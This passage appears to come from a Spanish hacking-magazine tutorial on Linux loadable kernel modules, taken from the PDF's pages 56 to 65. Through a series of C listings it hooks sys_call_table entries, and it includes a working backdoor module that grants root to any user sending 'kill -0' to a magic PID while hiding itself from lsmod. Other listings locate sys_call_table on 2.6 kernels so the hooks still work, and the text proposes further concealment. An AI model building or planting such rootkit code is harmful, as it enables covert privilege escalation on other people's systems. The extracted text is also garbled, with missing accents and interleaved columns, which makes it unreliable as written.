Aquellos archivos de cabecera usados por el preprocesador de C se sitan en el directorio /usr/include y definirn la interfaz de aquellos programas que son compilados, aqu entrara por ejemplo <stdio.h>. Estos archivos de cabecera (o "headers" en ingls) se enlazan con la biblioteca de C que es distribuida de forma independiente al ncleo, por otro lado el Kernel tambin dispone de archivos de cabecera que se usan para su compilacin y que se encuentran en '/usr/src/linux/include' aqu tenemos el directorio 'linux' que contiene declaraciones que no dependen de la arquitectura y 'asm' para las que s dependen de la arquitectura.

Ahora vamos a compilar y ejecutar el ejemplo para ver si funciona as podrs sacar las conclusiones pertinentes, n o t a q u e l a s a l i d a p u e d e va r i a r l i g e ra m e n t e e n t u ordenador. 56/68

HACKEANDO EL NCLEO - HACKEANDO EL NCLEO

En primer lugar qu es una llamada al sistema? Como te he comentado hace un momento en el espacio de usuario un proceso tiene pocos privilegios y necesita del ncleo para trabajar con la mquina con total libertad. De sta manera podemos definir una llamada al sistema como la peticin transmitida por un proceso al ncleo que trata esta peticin con todos los privilegios, devuelve un resultado al proceso y lo hace seguir de forma normal. Para pasar a modo privilegiado (en Linux) el proceso ejecuta una instruccin concreta (Int 0x80) que le hace pasar al modo ncleo y as atender su propia llamada al sistema mediante cierta rutina del ncleo. Por supuesto suponemos que dicha rutina es totalmente fiable para ejecutarse en modo privilegiado contrastando con la no confiabilidad en el proceso situado en espacio de usuario. Puedo implementar mis propias rutinas de sistema, recompilar el kernel y poder usarlas en mis programas sin ms? S, por supuesto, y adems no es nada complicado siempre y cuando tengas en cuenta que debers declarar tu funcin explcitamente ya que seguramente no vendr incorporada en la biblioteca de C. Pero nosotros no vamos a entretenernos creando nuevas llamadas al sistema, tenemos otro trabajo que hacer jeje.

Para cargar y descargar mdulos tienes a tu entera disposicin (como root) dos comandos que son: -- 'insmod lmk.o' para insertar -- 'rmmod lkm' para descargar un mdulo Estos programas pueden diferir segn el tipo de Kernel que tengas, para cada caso necesitars instalar los adecuados. En el caso de la serie 2.6 los mdulos se insertan mediante 'insmod lmk.ko' en lugar de ".o" En cualquier momento puedes ver que mdulos hay cargados mediante 'lsmod'. Pero la verdad es que todo eso as sin ms no tiene demasiado sentido lo mejor ser dar paso al siguiente listado que iremos explicando paso a paso y que es vlido para los ncleos de la serie 2.2 y 2.4 (tambin lo es de hecho para la serie 2.6 pero existen ciertas particularidades a tener en cuenta as que lo vemos ms adelante por separado). //---------------- listado 2 ------------------#define MODULE #define __KERNEL__ #include <linux/version.h> #include <linux/kernel.h> #include <linux/module.h> MODULE_PARM(parm_entero, "i"); int parm_entero; int init_module() { printk("HxC LKM cargado!\n"); printk("parm_entero vale:%i\n", parm_entero); return 0; } void cleanup_module() { printk("HxC LKM descargado!\n"); } MODULE_LICENSE("HxC - GPL"); MODULE_AUTHOR("HxC - PcPaso a Paso"); //---------------- final listado 2 --------------Muy bien, ahora se supone que tenemos que compilar y probar ese cdigo pero para explicarte como funciona y como cargarlo tenemos que pasar el siguiente punto

Por fin, ya estamos en la parte ms importante de ste artculo de cara a conseguir el objetivo que estamos persiguiendo. Vamos all. Existen varios componentes en el ncleo de Linux que no es necesario tener siempre cargados en memoria por varios motivos, por ejemplo si ningn usuario necesita trabajar con particiones NTFS podemos no cargar el mdulo que nos permite trabajar con el sistema de ficheros NTFS. Sin embargo, cualquier cosa que modifiquemos del ncleo como aadir o eliminar algn gestor de dispositivo, implicaran tener que recompilar el ncleo si no disponemos de una manera de "extenderlo" en caliente. Afortunadamente, s disponemos de los mdulos cargables del kernel o "Loadable Kernel Modules" (LKM a partir de ahora) que nos permiten dotar de modularidad al ncleo. Estos LKM's se integrarn dinmicamente en el Kernel si los necesitamos o tambin cuando insertamos un mdulo a mano, slo un usuario privilegiado puede eliminar o insertar un LKM aparte del propio ncleo claro est. Nota tambin que debers tener el soporte para mdulos cargables habilitado en el ncleo, por lo general el soporte viene habilitado pero puede haber algunas distribuciones que por unos motivos u otros no permitan la carga d i n m i c a d e m d u l o s , d e m a n e ra q u e t e n d r s q u e recompilar tu Kernel llegado el caso.

Como iba diciendo tenemos un mdulo que compilar, para ello usaremos gcc pero no de la misma forma con la que compilaras un programa normal en C. Para compilar el ejemplo anterior debers usar algo como lo siguiente asumiendo que "/usr/src/linux" apunta al directorio con las fuentes del kernel: 57/68

HACKEANDO EL NCLEO - HACKEANDO EL NCLEO

root# gcc -c listado2.c -I /usr/src/linux/include lo que nos genera un fichero "listado2.o" (fichero objeto) listo para ser insertado. Pues bien, lo insertamos, para que esperar root# insmod listado2.o parm_entero=5 Warning: loading listado2.o will taint the kernel: non-GPL license - HxC - GPL See http://www.tux.org/lkml/#export-tainted for information about tainted modules Module listado2 loaded, with warnings Como ves ha sido cargado (lsmod)... muy bien, pero nos da una advertencia y ahora qu? No hay problema, eso lo que viene a decir es que la licencia del mdulo no es GPL pura puesto que yo he indicado (no por casualidad) "HxC - GPL" en lugar de "GPL". La alerta nos dice que el Kernel est "tainted" (manchado) no obstante de cara al funcionamiento del mdulo es totalmente irrelevante para nosotros, se trata simplemente de un mecanismo para definir licencias. Insisto en que eso es irrelevante, puedes indicar "GPL" o bien compilar con "-w" si no quieres que aparezcan "warnings". Puede resultar interesante visualizar informacin sobre un mdulo usando 'modinfo modulo.o': root# modinfo listado2.o filename: listado2.o la nica que merece una explicacin es MODULE_PARM, ya que nos permite pasar parmetros al mdulo. Estos parmetros pueden ser de tipo 'i' (int) o bien 'h' (short), 's' (string), 'l' (long), etc. Supongo que el ejemplo ilustra como son pasados los parmetros por lo que no nos entretendremos ms con eso. Luego tenemos dos rutinas que son -- "init_module()" -- "cleanup_module()" la primera se ejecuta al cargar el mdulo y la segunda es una rutina de supresin con descarga. Otra cosa a destacar es que no usamos "printf()" para imprimir mensajes sino que usamos "printk()" puesto que estamos trabajando dentro del espacio del ncleo y a ms bajo nivel. Acabo de decir que usamos printk para imprimir mensajes pero seguramente ahora te asalta una duda de qu mensajes estoy hablando sino ves nada en pantalla? Jejeje, el caso es que los LKM's no pueden imprimir directamente en pantalla salvo que hagamos algo para que eso ocurra entonces qu pasa? Lo que pasa es que son registrados por el Syslog del sistema. Puedes echar un vistazo al terminal del Syslog (teclas ctrl + alt + f12), podrs ir viendo los mensajes logueados y registrados en "/var/log/messages/" De ah que puedas hacer lo siguiente para mostrar las tres ltimas lneas de ese fichero con algo similar a: root#tail -n3 /var/log/messages kernel: HxC LKM cargado! kernel: parm_entero vale:5 kernel: HxC LKM descargado! Si aparece que el mdulo ha sido descargado es porque hemos hecho 'rmmod listado2' previamente, no es un LKM muy til .

description: <none> author: license: parm: "HxC - PcPaso a Paso" "HxC - GPL" parm_entero int

Es posible que al intentar insertar el mdulo te haya dicho algo as como que no encuentra la versin del Kernel o que la versin del Kernel para la que fue compilado el LKM no coinciden, puedes solucionar esto editando "/usr/src/linux/include/linux/version.h" y adaptarlo para que sea la misma versin que la indicada por 'uname -r' (es una medida para salir del paso pero funcionar). Pero veamos las cosas importantes, en primer lugar fjate que tenemos que declarar ciertas macros e incluir unos f i c h e r o s c o n c r e t o s , s i n o e l p r o g ra m a n o c o m p i l a r debidamente ya que lo que estamos compilando es un mdulo que ser insertado en el Kernel. De esas tres macros que son --- "MODULE_PARM" --- "MODULE_AUTHOR" --- "MODULE_LICENSE"

Ha llegado ese momento en el que necesitamos tirar de las llamadas al sistema (syscalls) para nuestras "oscuras intenciones" de manera que las vamos a declarar en nuestro mdulo: extern void *sys_call_table[]; Con eso ya podremos acceder al vector que sirve de contenedor para saber dnde tenemos que saltar en la memoria al realizar llamada, lo cual no es poca cosa, jeje. Nadie dice que no podamos meter nuestras zarpas en ese vector y enganchar ("hook") literalmente una rutina que se ejecutara en lugar de la supuesta syscall a la que se llam m m m c o m p l i c a d o ? Q u e va , t e p o n g o u n o ejemplos que te lo aclararn.

58/68

HACKEANDO EL NCLEO - HACKEANDO EL NCLEO

//------------- listado 3 -------------------------#define MODULE #define __KERNEL__ #include <sys/types.h> #include <asm/unistd.h> #include <linux/version.h> #include <linux/kernel.h> #include <linux/module.h> extern void *sys_call_table[]; long (* hook_chmod)(const char *fichero); long mi_chmod(const char *fichero){ printk("[HxC LKM] CHMOD inhibido!!\n"); return 0; } int init_module() { printk("LKM Listo y funcionando.\n"); hook_chmod=sys_call_table[__NR_chmod]; sys_call_table[__NR_chmod]=mi_chmod; printk("@SYS_chmod: 0x%p\n",hook_chmod); return 0; } int cleanup_module(){ printk("Descargando...\n"); sys_call_table[__NR_chmod]=(void *)hook_chmod; } //------------ final listado 3 -------------------Si ahora un usuario intenta hacer "chmod" para modificar los atributos de un fichero, por ejemplo "chmod a+rx fichero" podr observar como no surge ningn tipo de efecto, no se procesa la verdadera syscall de chmod sino la suplanta da y por tanto se mostrar un mensaje por pantalla indi cando el evento. Cmo es posible? Fcil, te lo explico. Resulta que he creado un puntero a una funcin (man ch mod) de manera que al inicializar el LKM he guardado en "hook_chmod" la direccin de la syscall __NR_chmod ori ginal dentro del vector con el fin de poder restaurarla al descargar el mdulo (queremos seguir usando el verdade ro chmod despus de jugar ) y a continuacin hemos re direccionado __NR_chmod a la direccin de memoria don de tenemos nuestra funcin (mi_chmod) de manera que cuando el sistema accede a __NR_chmod procesar la ru tina mi_chmod en lugar de la verdadera funcin chmod, de ah que no tenga efecto el comando chmod mientras tengas el LKM cargado. Vale!, ya s... te ests preguntando de dnde narices saco yo los nombres de las syscalls, saciars tu curiosidad en cuanto eches un vistazo a "<asm/unistd.h>": $cat /usr/src/linux/include/linux/asm/unistd.h|less Ah tienes parejas de syscalls y nmero identificador, ch mod es la 15 en mis fuentes. Si adems tienes algo ms de tiempo te sugiero echar otro vistazo a "/usr/src/linux/include/linux/syscalls.h" si podemos refe rirnos a las syscalls con __NR_ es porque usamos <asm/unistd.h>. Ahora vamos a ver otro listado para ilustrar como podemos reservar y liberar memoria en el espacio del kernel me diante "kmalloc()" y "kfree()" as como la manera de pasar datos desde el espacio de usuario a la memoria del ncleo y al revs gracias a las funciones "__gene ric_copy_from_user" y "__generic_copy_to_user" respec tivamente, "memset" se utiliza para llenar la memoria con un byte constante y "GFP_KERNEL" indica el tipo de asignacin de memoria para el ncleo. Lo que hace es simplemente manipular la syscall rename para que siempre se renombre por "HxC" al hacer 'mv ori gen destino' puedes comprobarlo, procura no sobrescribir ficheros y descargar el mdulo cuando hayas visto que funciona usando rmmod. //-------------- listado 4 ----------------------#define MODULE #define __KERNEL__ #include <linux/version.h> #include <linux/kernel.h> #include <asm/unistd.h> #include <linux/module.h> #include <linux/mm.h> extern void *sys_call_table[]; int (*hook_mv)(const char *desde, const char *hasta); int mi_mv(const char *desde, const char *hasta) { char *kbuff1=(char *)kmalloc(strlen(desde)+1, GFP_KERNEL); memset(kbuff1, 0, strlen(desde)+1); __generic_copy_from_user(kbuff1, desde, strlen(desde)+1); __generic_copy_to_user(hasta,"HxC"); kfree(kbuff1); return((*hook_mv)(desde, hasta)); } int init_module() { printk("HxC LKM cargado!\n"); hook_mv=sys_call_table[__NR_rename]; sys_call_table[__NR_rename]=mi_mv; return(0); } void cleanup_module() { printk("HxC LKM descargado!\n"); sys_call_table[__NR_rename]=hook_mv; } //----------------- final listado 4 ----------------Aunque hasta el momento todos los ejemplos que te estoy poniendo tienen una utilidad bastante absurda (te los pongo sobre la marcha con el objetivo de explicar algunas cosas) ya te habrs dado cuenta de la potencia de un LKM de cara a su uso en sistemas comprometidos. No resulta complicado averiguar como trabaja el sistema con los procesos, los fiche ros y dems para poder - por ejemplo - ocultar un fichero o incluso el propio mdulo en la memoria.

59/68

HACKEANDO EL NCLEO - HACKEANDO EL NCLEO

Tendiendo en cuenta todo lo que te he explicado por el momento en este artculo y lo visto en la revista hasta ahora, sabrs que el uid0 se corresponde al id de root (usuario privilegiado) y que al explotar ciertas vulnerabili dades es necesario en algunos casos usar setuid() para es tablecer privilegios de root. En el siguiente cdigo se ilus tra como evitar que se use setuid(0) por usuarios distintos a root todo debidamente monitoreado. //---------------- listado 5 ---------------#define MODULE #define __KERNEL__ #include <asm/unistd.h> #include <linux/sched.h> #include <linux/version.h> #include <linux/kernel.h> #include <linux/module.h> extern void *sys_call_table[]; long (* hook_suid)(uid_t uid); long nosuid(uid_t uid){ int res; if (current->uid && !uid){ printk("[ALERTA] Se ha ejecutado setuid 0 desde un usuario no root!\n"); printk("info: PID(%i) PGRP(%i) E/UID (%i , %i) => %i [DENEGADO]\n", current->pid, current->pgrp, current->euid, current->uid, uid); res=(* hook_suid)(current->uid); } res=(* hook_suid)(uid); } int init_module() { printk("LKM Listo y funcionando.\n"); hook_suid=sys_call_table[__NR_setuid32]; sys_call_table[__NR_setuid32]=nosuid; return 0; } int cleanup_module(){ printk("Descargando...\n"); sys_call_table[__NR_setuid32]=hook_suid; } //------------------ final listado 5 ---------------root# su linux linux$ su root linux$ tail /var/log/messages [ALERTA] Se ha ejecutado setuid 0 desde un usuario no root! ... La novedad en el cdigo anterior es en primer lugar que el cdigo es ligeramente ms til :P y luego que he usado "current" para referirnos a nosotros mismos, es decir, al proceso en ejecucin en un instante determinado. Es por eso que he incluido "<linux/sched.h>". Si miras ah dentro tienes una gran estructura "task_struct" que caracteriza a un proceso.

Por el precio de modificar una lnea podemos hacer que un usuario no root pase a coronarse con uid 0 ya sabes cmo? Efectivamente basta con modificar la lnea en la que llamo al setuid(uid_t) real por: res=(* hook_suid)(0); Ya tenemos controlado setuid(0). Ahora te invito a contro lar la syscall SYS_kill, seguro que con todo lo que has visto arriba no ser nada complicado manipularla y puede resul tar interesante proteger programas que corren en el espa cio de usuario sin privilegios pero que no queremos que puedan ser matados por cualquiera mediante "kill -9 pid", visita "<linux/syscalls.h>" para ver como pinta SYS_kill.

Con todo lo que sabes est totalmente tirado hacer una puerta trasera en el sistema para asegurarnos privilegios de root, de hecho un LKM es una forma muy elegante de hacerlo. En el siguiente listado veremos un mdulo que dar privi legios efectivos de root (euid=0) al user que intente man dar la seal '-0' mediante 'kill' a un proceso con un pid determinado por "COOLPID", bastar con ejecutar lo si guiente: linux$ kill -0 00000 (al hacer 'id' vers lo que ocurre). Por supuesto no nos interesa que nadie sepa que tienes un mdulo cargado (imagina hacer 'lsmod' y ver un mdulo llamado "backdoor" xD) por lo que al inicializar la carga del mismo haremos que "desaparezca" ---> el co mo te lo explico a continuacin despus de que te mires un poco el cdigo que aunque est claro que es infinita mente mejorable, como ejemplo es perfecto //---------------- BACKDOOR1.c (listado 6) --------------#define __KERNEL__ #define MODULE #include <linux/kernel.h> #include <linux/version.h> #include <linux/module.h> #include <asm/unistd.h> #include <linux/sched.h> #define COOLPID 00000 EXPORT_NO_SYMBOLS; extern void *sys_call_table[]; int (*killsysc)(pid_t pid,int sig);

60/68

HACKEANDO EL NCLEO - HACKEANDO EL NCLEO

int hook(pid_t pid,int sig){ if (sig==0 && pid== COOLPID) { current->euid=0; current->uid=0; } return 0; } int init_module(){ struct module *yo = &__this_module, *secuestrado = NULL; secuestrado = yo->next; if (!secuestrado) return -1; yo->name = secuestrado->name; yo->flags = secuestrado->flags; yo->size = secuestrado->size; yo->next = secuestrado->next; killsysc=sys_call_table[__NR_kill]; sys_call_table[__NR_kill]=hook; return 0;} int cleanup_module(){ sys_call_table[__NR_kill]=killsysc; return 0;} //------------ final backdoor 1 (listado 6)-----------llamada a kill se omite sencillo no? Jeje ya se que a ms de uno le estoy metiendo un poco de caa pero si lo miras con calma vers que no tiene mayor dificultad.

En primer lugar djame aclararte que todo lo visto arriba tambin te servir para los ncleos de la serie 2.6 por lo general aunque tendrs que hacer algunas modificacio nes para adaptar el cdigo, por ejemplo, vamos a ver el primer LKM bsico para un ncleo 2.6 //--------------- inicio listado 7 --------------#include <linux/init.h> #include <linux/module.h> #include <linux/kernel.h> static int __init carga(void) { printk(KERN_INFO "HxC: LKM preparado!\n"); return 0; }

Muy bien, ahora mismo ests viendo un par de cosas que te tendrn descolocado, en primer lugar qu es ese "EX PORT_NO_SYMBOLS"? Resulta que al insertar el mdulo nuestras con nuestras funciones se exportan y as los sm bolos pueden ser usados por otros mdulos, si ejecutas: $cat /proc/ksyms vers la lista de smbolos exportados actualmente en el Kernel, lo que puede ser bastante sospechoso para nuestro backdoor, no cuesta nada NO exportar los smbolos me diante esa macro. Me gustara que eches un vistazo "<linux/module.h>" por que de ah he sacado la informacin para la estructura "module" que he utilizado entre otras cosas- para ocultar el mdulo. Como el Kernel guarda una lista simple enlaza da con los mdulos cargados es muy fcil reajustar los punteros al mdulo siguiente para eliminar un elemento existente. Al insertar un nuevo mdulo ste pasa a ser la referencia al inicio de la lista, de manera que se complica el poder quitarnos a nosotros mismos del medio. La solucin como habrs visto no es compleja de entender. Lo que hacemos es coger el siguiente mdulo a nosotros en la lista, obtener sus propiedades (las que 'lsmod' muestra) y sacar al mdulo suplantado de la lista enlazada, lo que no deshabi lita el mdulo simplemente lo oculta, se trata de un camu flaje simple pero funciona y eso es lo que vale . El resto del cdigo es lo que venimos haciendo, hemos in terceptado la syscall __NR_kill de manera que cada vez que se ejecute llama a "hook (pid_t,pid)" que verifica si "pid_t = 0 y pid = COOLPID" si es as establece los privi legios del proceso a uid =0 (root) y euid=0, la autntica

static void __exit descarga(void) { printk(KERN_INFO "HxC: Nos vamos..."\n"); } module_init(carga); module_exit(descarga); //---------- final listado 7 ------------------------Lo que notars rpidamente es que he aadido "<li nux/init.h>" para las macros "module_init" y "modu le_exit". El caso es que el mtodo usado a partir de ahora para llamar a las funciones init_module y cleanup_module es mediante esas dos macros, lo que nos permite llamar a nuestras rutinas de carga y descarga con el nombre que queramos. Otra cosa, he aadido ah "KERN_INFO" a printk, cosa que hasta ahora no haba hecho. Esto sirve para establecer una prioridad a la hora de registrar o imprimir nuestro mensaje y por defecto tiene prioridad "DEFAULT_MESSAGE_LOGLEVEL"

61/68

HACKEANDO EL NCLEO - HACKEANDO EL NCLEO

Mira el fichero kernel.h si tienes alguna duda sobre esto, te muestro en todo caso las prioridades ordenadas de ma yor a menor: KERN_EMERG KERN_ALERT KERN_CRIT KERN_ERR <0> <1> <2> <3> Una IDT de sistema (Interrupt Descriptor Table) es una ta bla en la que sea mapea cada vector a un manejador de excepcin o una interrupcin, el registro "idtr" (en arqui tectura x86) contiene la direccin de la base de la IDT Linux utiliza dos tipos de descriptores las "Trap Gates" y las "Interrupt Gates" de manera que los "Gate Descriptors" (traducido "descriptores de puerta o pasarela") sirven co mo identificador para la direccin de una interrupcin o manejadores de excepciones. Debes notar que ocurrir un "fallo de proteccin general" cuando el nivel de privilegios del Gate Descriptor sea inferior al indicado por el nivel de privilegio de un programa. Un System Gate que es un tipo de Gate corre con un nivel de privilegio 3 (su Descriptor Privilege Level o "DPL" vale 3 para las "System Gates" y 0 para "Trap Gates" por ejem plo) esto es muy interesante para nosotros en el aspecto en que el vector 128 puede ser accedido por medio de sys calls gracias a la famosa Int 0x80 a de Linux y es lo que hacen los programas en modo de usuario como ya te expli qu al principio. Vale! Lo se... parece complicado as que te lo vuelvo a ex plicar de otra manera a ver si queda ms claro . Resulta que tenemos una IDT y una GDT (tabla de descrip tores global) de manera que cuando queremos acceder a una syscall de sistema usando IDT + GDT se ejecuta una syscall definida definida dnde? Jeje pues en "ar ch/i386/entry.S" gentileza del propio Linus Torvalds "/usr/src/linux/arch/i386/kernel/entry.S" Las Interrupciones son eventos que nos permiten modificar la secuencia actual de instrucciones que la CPU (x86) pro cesa. Internamente Linux y tu mquina usan el vector 128 (Int 0x80) para las llamadas al sistema.

KERN_WARNING <4> KERN_NOTICE KERN_INFO KERN_DEBUG <5> <6> <7>

No aparecen arriba "#define __KERNEL__" y "MODULE" ya que si lo haces seguramente se te advertir de que las de claraciones estn redefinidas.

Puede que alguien ya se me haya adelantado a compilar el ejemplo anterior y habr visto que no pudo ser, jeje para los mdulos que tengan como destino la nueva serie usa remos una forma un tanto ms sofisticada. En primer lugar necesitaremos crear un fichero llamado "Makefile" cuyo contenido sea: obj-m := modulo.o Explicar ahora el funcionamiento de los Makefile y dems escapa de las pretensiones de ste artculo pero qudate con que "modulo.o" es el nombre del LKM que deseas compilar. Hecho esto y situados en un directorio que contiene tanto el "modulo.c" como el fichero Makefile ejecutamos lo si guiente: root# make -C /usr/src/linux SUBDIRS=$PWD modules Una vez terminado el proceso tendrs un "modulo.ko" ge nerado listo para que lo insertes de manera habitual con 'insmod', para eliminar el mdulo se hace de igual forma con 'rmmod'.

Lo ideal sera que edites (slo lectura) "arch/i386/entry.S" con tu editor favorito para buscar una parte igual o muy similar a la que te muestro, el siguiente cdigo es de un Kernel 2.6.9 en un 2.4 cambia ligeramente pero la idea es la misma. //--------------- de entry.S lnea 277 ? ----------------ENTRY(system_call) pushl %eax SAVE_ALL GET_THREAD_INFO(%ebp)
testb $(_TIF_SYSCALL_TRACE|_TIF_SYSCALL_AUDIT),TI_flags(%ebp)

De nuevo si eres impaciente habrs ido rapidito a compilar el backdoor que se present para la serie 2.4 y te habr salido un error de aquellos que no sabes por donde coger y es que la famosa Sys_call_table que usbamos para en ganchar las syscalls ya no est disponible para su uso in discriminado... pues vaya m*erd*! Je,je no pasa nada algo tenemos que hacer y lo haremos, slo supondr un poco ms de trabajo

jnz syscall_trace_entry cmpl $(nr_syscalls), %eax

62/68

HACKEANDO EL NCLEO - HACKEANDO EL NCLEO

jae syscall_badsys syscall_call: call *sys_call_table(,%eax,4) movl %eax,EAX(%esp) syscall_exit: [...] //-------------- final cdigo [cont.] -----------Fjate bien en la lnea que va justo despus de la etiqueta "syscall_call:" ah lo que hace es hacer una llamada pasan do en el registro EAX el nmero de la syscall. En el mismo fichero entry.S ms abajo sobre la lnea 618 de mi kernel 2.6.9 segn mi editor hay algo como: //---------------- de entry.S lnea 618 ? ---------------ENTRY(sys_call_table) .long sys_restart_syscall .long sys_exit .long sys_fork .long sys_read [...] //------------- final cdigo entry.S ------------------donde sys_restart_syscall sera la syscall #0 y sys_exit la #1, bien ese es el lugar para ir a mirar el smbolo corres pondiente. Ahora tenemos que volcar el contenido de "entry.o" (fiche ro objeto) del mismo directorio actual de entry.S buscan do algo MUY concreto. Queremos esa direccin mgica y especial que tan ansiadamente buscamos... hemos venido a por la sys_call_table y no nos iremos sin ella! Desensamblar (--vaya palabreja) el cdigo mediante GDB, tu usa el que ms te guste para buscar ese call. root# gdb entry.o (gdb) disassemble syscall_call Dump of assembler code for function syscall_call: 0x0000014c <syscall_call+0>: call *0x0(,%eax,4) 0x00000153 <syscall_call+7>: mov %eax,0x18(%esp) End of assembler dump. (gdb) x 0x0000014c+0 0x14c <syscall_call>: 0x008514ff (gdb) x 0x0000014c+1 0x14d <syscall_call+1>: 0x00008514 (gdb) x 0x0000014c+2 0x14e <syscall_call+2>: 0x00000085 [...] //-------- va a ser que si xD --------------------Efectivamente y para que sea vea ms claro volcando el fichero desensamblado tenemos: //-------------------------------------------------0000014c <syscall_call>: 14c: ff 14 85 00 00 00 00 call *0x0(,%eax,4) 153: 89 44 24 18 mov %eax,0x18(%esp) //--------------------------------------------------Perfecto! A partir de aqu ya podemos encontrar la sys_call_table. Sin excesiva complicacin te he programa do algo en C para la ocasin ilustrando el proceso anterior. Para verificar que funciona he metido un hook que siem pre devolver uid 0 lo que no significa necesariamente que tengamos los privilegios de root sin ms, pero si la cosa funciona es lo que har. //------------------- listado 8 --------------#include <linux/init.h> #include <linux/module.h> #include <linux/kernel.h> #include <linux/mm.h> #include <asm/unistd.h> struct { unsigned short off1; unsigned short sel; unsigned char none,flags; unsigned short off2; } __attribute__ ((packed)) idt; struct { unsigned short limit; unsigned int base; } __attribute__ ((packed)) idtr; uid_t (* restaura)(void); int *sys_call_table; uid_t cero_uid(void){ return 0; } static void syscalltable(void) {

//--------- yo haciendo el cabra con el gdb xD -----------

63/68

HACKEANDO EL NCLEO - HACKEANDO EL NCLEO

unsigned int offs,i; char sccall[128]; asm("sidt %0" : "=m" (idtr)); printk(KERN_ALERT "[IDTR] Base en @:0x%x\n", idtr.base); memcpy(&idt,(void *)(idtr.base+8*0x80), sizeof(idt)); offs = (idt.off2 << 16) | idt.off1; printk(KERN_ALERT "[IDT(80h)] Descriptor en @:0x%x\n \ ...verificando 'call'...\n", offs); memcpy(sccall, (void *)offs ,128); i=0; while((i<128) && !((sccall[i] == '\xff') && (sccall[i+1]== '\x14') && (sccall[i+2]== '\x85'))){ i++; } sys_call_table =(void*) (*(int *) &sccall[i+3]); printk(KERN_ALERT "[OK!] Sys_call_table -> 0x%p\n", sys_call_table); } static int __init buscarsct(void) { printk(KERN_ALERT "[CARGADO!] Buscando Sys_call_table...\n"); syscalltable(); /* vamos a ver si es verdad... ;) */ restaura=sys_call_table[__NR_getuid32]; sys_call_table[__NR_getuid32]=cero_uid; return 0; } static void __exit descarga(void) { sys_call_table[__NR_getuid32]=restaura; } module_init(buscarsct); module_exit(descarga); //------------------ final listado 8 -----------------Vale, tengo que admitir que visto as de golpe asusta un poco pero no importa porque la verdad es que llegados a ste punto no es lo ms importante dominar a la perfeccin ese cdigo sino ms bien saber que puedes uti lizar esa funcin "syscalltable()" en tus programas para obtener la Sys_call_table y poder usarla sin ms como he mos visto en el resto de LKM's anteriores. Como el anterior listado se nos alarga un poco debido a las cosas que tenemos que hacer he decidido ir an ms all jejej y hacer otro cdigo con un algoritmo ms "atpico" (tanto que no estoy seguro de que funcione al 100% en todas las mquinas ) Es mucho ms breve... la verdad es que explicar ahora su funcionamiento va ms all de lo que busca el artculo as que me limito a comentar aqu lo estrictamente necesario puesto que ya tenemos otro sistema que funciona. Lo dicho, a quienes quieran entender con ms exactitud su funcionamiento os remito a "<asm/processor.h>" donde encontraris una estructura llamada "cpuinfo_x86" con un montn de informacin muy interesante... como el resto del fichero la verdad. Encontraris varias menciones a "loops_per_jiffy" y "boot_cpu_data" que son las nicas cosas de ste cdigo que seguramente no os suenen nada. Bsicamente lo que hacemos es encontrar SYS_exit y a partir de ah la Sys_call_table, el cdigo aunque no esta mal no es perfec to ni mucho menos, sintete libre de mejorarlo //------------- listado 9 ----------------------#include <linux/module.h> #include <linux/kernel.h> #include <linux/init.h> #include <asm/unistd.h> #include <asm/types.h> #include <asm/processor.h> int *sys_call_table; uid_t (* restaura)(void); uid_t cero_uid(void){ printk(<!>h00k\n); return 0; } static int __init carga (void) { unsigned long pointr; unsigned long *sys; extern int loops_per_jiffy; sys_call_table = NULL; printk (KERN_ALERT "Buscando Sys_call_table...! \n"); printk (">> Localizando __NR_exit..."); for (pointr = (unsigned long) &loops_per_jiffy; pointr < (unsigned long) &boot_cpu_data; pointr += sizeof (void *)) { sys = (unsigned long *) pointr; if (sys[1] == (unsigned long) __NR_exit){ sys_call_table = (void **) sys; sys_call_table -= 304;// calculado :) printk (" OK!\n__NR_exit localizado en: 0x%p\n", (void *) sys_call_table[__NR_exit]); break; } }

64/68

HACKEANDO EL NCLEO - HACKEANDO EL NCLEO

if (!sys_call_table) { printk (KERN_ALERT "\n[ERR] No pudo ser, rmmod modulo!...\n"); return 0; } printk (KERN_ALERT ">> Sys_call_table[] localizada! -> 0x%p\n", sys_call_table); restaura=sys_call_table[__NR_getuid32]; sys_call_table[__NR_getuid32]=cero_uid; return 0; } static void __exit descarga (void) { printk("Descargado!"); sys_call_table[__NR_getuid32]=restaura; } module_init (carga); module_exit (descarga); //---------------- final listado 9 --------------"getdents()" , y Qu haremos nosotros para manipular ese proceso? ...Usar "SYS_getdents" lee la documentacin de las "manual pages" de getdents y entenders como funciona

Lo que hace execve es bsicamente ejecutar otro programa, pero hay una pega y es que en nuestro LKM execve necesita hacer una serie de operaciones previas como usar la pila (stack) con los parmetros. Pero el Kernel y nosotros estamos preparados para ese problemilla. Si miras en unistd.h vers que hay una serie de syscalls nulas, sin ir ms lejos la #222 no est , es una "sys_ni_syscall" y pide a gritos que la usemos, por lo que movemos la SYS_execve original a esa posicin nula (u otra de tu conveniencia) para llamarla desde otra funcin nuestra... pero claro cmo llamamos a execve? Si lo hacemos directamente la cosa no va a funcionar por lo que te comentaba y si hacemos el hook, eso que es imprescindible que suceda no va a pasar, de manera que necesitamos una buena manera de llamar a execve y que mejor que mirar como lo hace el Kernel no? Abre nuevamente unistd.h y fjate en un trozo de cdigo al final que referencia a la macroinstrusin "_syscall3" : //---------------------- _syscall3------------------long __res; \ __asm__ volatile ("int $0x80" \ : "=a" (__res) \ : "0" (__NR_##name),"b" ((long)(arg1)),\ "c" ((long)(arg2)), \ "d" ((long)(arg3))); \ __syscall_return(type,__res); \

Pues s, ahora que ya tenemos la Sys_call_table no es complicado - ni mucho menos- trasladar el backdoor presentado antes para 2.4 a la serie 2.6 pero ya que estamos puestos deberamos implementar algunas otras funcionalidades o al menos plantear cosas que podramos hacer ahora puesto que tenemos el control de las syscalls. El nico limite es nuestra imaginacin.

Dentro de lo que cabe hemos sido ni@s buenos con esos mdulos pero si pensamos un poco en seguida vemos que se pueden hacer cosas mucho ms potentes que las que hemos tratado arriba con un propsito educativo (como siempre jeje) pero no es el momento de verlas ahora pues ya sera demasiado para empezar... o quizs no ? mira, lo que si que har es plantearte unas cuantas cosas para que "las reflexiones en C"

} //-----------------final_syscall3---------------------Vale, dije que evitara el ensamblador y es lo que estoy haciendo Si te fijas execve() requiere tres argumentos y esa macrointrusin (expandida por el preprocesador) permitir llamar a una funcin con tres parmetros. En el caso que nos ocupa execve() es generada por _syscall3 que inicializa los registros del procesador y desencadena la Int 0x80, en caso de error se pone en la variable global "errno", el cdigo de error y se retorna -1, si tiene xito se vuelve a quien llam Nos bastar entonces con rellenar esa macrointrusin adecuadamente en una funcin "mi-execve" que quedara como esta sabiendo que __NR_mi_execve sustituye a la __NR_execve original.

